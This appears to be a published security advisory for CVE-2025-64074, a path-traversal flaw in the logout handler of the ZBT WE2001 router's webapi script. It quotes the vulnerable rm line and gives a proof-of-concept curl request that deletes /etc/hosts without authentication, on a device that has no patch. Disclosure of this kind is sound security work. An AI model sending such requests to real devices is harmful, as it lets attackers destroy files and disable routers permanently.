Neutrino Security

Arbitrary file deletion via logout function

CVE ID CVE-2025-64074 CVSS 5.3 (MEDIUM)
CWE CWE-22 AFFECTED COMPONENT logout function
PRODUCT WE2001 VERSION V23.09.27
EXPLOITABILITY Remote, Unauth IMPACT Arbitraty file deletion, Permanent DoS

Summary

A path-traversal vulnerability in the logout functionality of Shenzhen Zhibotong Electronics ZBT WE2001 23.09.27 allows remote attackers to delete arbitrary files on the host by supplying a crafted session cookie value.

Details

The vulnerability exists in the logout operation within the webapi shell script. The application uses the access_token parameter to construct a file path for deletion without proper validation or sanitization.

The following webapi code extract demonstrates how the user input FORM_access_token (access_token) is directly concatenated into the rm command:

if [ "$op" == "logout" ];then
	if [ -n "$FORM_access_token" ];then
		rm /tmp/webapi_token/session/${FORM_access_token}
	fi

	json_init
	json_add_string code "1"
	json_add_string reason "success"

	echo -n "$(json_dump)"
fi

The script intends to delete a session file located inside /tmp/webapi_token/session/. However, because the rm command accepts the ${FORM_access_token} variable without filtering for directory traversal characters, an attacker can manipulate the path to point to any file on the system.

Prerequisites: For the traversal to successfully step out of the directory tree, the base path /tmp/webapi_token/session/ must exist. In a default installation, this directory is automatically created when at least one valid session is active. Therefore, the vulnerability relies on the presence of this temporary directory structure to serve as a pivot point.

PoC

To reproduce this vulnerability, an attacker can send a crafted HTTP request via either GET or POST methods simply using curl.

In this case the payload uses path traversal sequences to traverse up from the session directory to the root directory and delete the /etc/hosts file.

PATH_TO_FILE="/etc/hosts"

curl --path-as-is -k "http://192.168.1.1/cgi-bin/webapi?op=logout&access_token=../../..${PATH_TO_FILE}"

Impact

Attackers can arbitrarily delete critical application data, configuration files, or even system binaries and boot configurations, rendering the device completely unbootable and resulting in a Permanent Denial of Service. Since the webapi CGI script runs with root privileges, the vulnerability allows the deletion of any file on the filesystem regardless of permissions.

Remediation

At the time of this publication, there is no official patch or remediation available from the vendor.

Disclosure Timeline

Date Event
2025-10-23 Initial report sent to MITRE.
2025-11-12 CVE ID reserved/assigned by MITRE.
2026-02-11 Public disclosure.

Credits

Adrià Pérez Montoro (b1n4ri0)